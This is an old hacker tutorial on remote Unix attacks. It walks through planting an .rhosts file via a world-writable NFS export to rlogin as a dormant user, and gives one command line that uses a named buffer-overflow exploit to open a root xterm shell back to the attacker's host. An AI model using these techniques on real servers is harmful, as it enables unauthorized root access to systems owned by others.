Unix Remote Attacks

[Dr4k3]

Unix Remote Attacks

What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.

Here are a couple of examples:

1. You are root on a host named badguy.

2. You discover the host victim is exporting /home2/old read/writable to the world.

3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.

4. Quickly, you create a fred account on badguy.

5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.

6. After you become fred on badguy, you rlogin to the victim as fred.

Here's another attack involving a buffer overflow:

1. This remote system is running named.

2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick, you compile it and name it sploit.

3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"

4. A window appears on your terminal that is running as root on ns.example.com.